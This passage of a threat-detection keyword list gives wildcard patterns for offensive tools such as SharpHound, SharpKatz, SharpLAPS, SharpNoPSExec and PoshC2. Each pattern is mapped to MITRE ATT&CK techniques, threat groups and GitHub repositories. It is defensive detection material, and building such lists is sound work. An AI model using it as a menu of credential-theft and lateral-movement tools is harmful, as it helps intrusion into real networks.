T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound.exe*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*SharpHound.exe*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SharpHound.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpHound.exe*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHound.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpHound.ps1*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SharpHound.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*SharpHound.ps1*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHound.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpHound2*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Sharphound2.*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound3*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Sharphound-Aggressor*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHoundCommon.*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHoundCommonLib*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*sharpinline *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Sharpkatz*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpKatz.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpKatz.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*SharpkatzManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpLAPS.*,offensive_tool_keyword,SharpLAPS,Retrieve LAPS password from LDAP,T1552.005 - T1212,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/swisskyrepo/SharpLAPS,1,1,N/A,10,4,338,68,2021-02-17T14:32:16Z,2021-02-16T17:27:41Z -*SharpLAPS.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpLAPS-main*,offensive_tool_keyword,SharpLAPS,Retrieve LAPS password from LDAP,T1552.005 - T1212,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/swisskyrepo/SharpLAPS,1,1,N/A,10,4,338,68,2021-02-17T14:32:16Z,2021-02-16T17:27:41Z -*SharpLDAP.csproj*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLDAP.exe*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLDAP.sln*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLDAP-main*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLdapRelayScan*,offensive_tool_keyword,SharpLdapRelayScan,SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan,T1557.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/klezVirus/SharpLdapRelayScan,1,1,N/A,7,1,72,16,2022-02-26T22:03:11Z,2022-02-12T08:16:59Z -*SharpLdapRelayScan*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*SharpMapExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpMiniDump*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpMiniDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpMiniDumpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpMove.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpNamedPipePTH.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpNoPSExec.csproj*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpNoPSExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpNoPSExec.exe*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpNoPSExec.sln*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpNoPSExec-master*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpPack*,offensive_tool_keyword,SharpPack,SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.,T1218.010 - T1218.011 - T1059 - T1127 - T1055,TA0002 - TA0008 - TA0006,N/A,N/A,POST Exploitation tools,https://github.com/mdsecactivebreach/SharpPack,1,0,N/A,N/A,2,145,34,2018-12-17T11:55:12Z,2018-12-17T10:51:19Z -*SharpPrinter.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpPrintNightmare*,offensive_tool_keyword,SharpPrintNightmare,C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527,T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,Exploitation tools,https://github.com/cube0x0/CVE-2021-1675,1,1,N/A,N/A,10,1736,587,2021-07-20T15:28:13Z,2021-06-29T17:24:14Z -*sharpps $psversiontable*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*sharpps get-process*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*sharppsexec*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpPsExecManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpPsExecService.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpRDP.*.dll.bin*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDP.csproj*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated 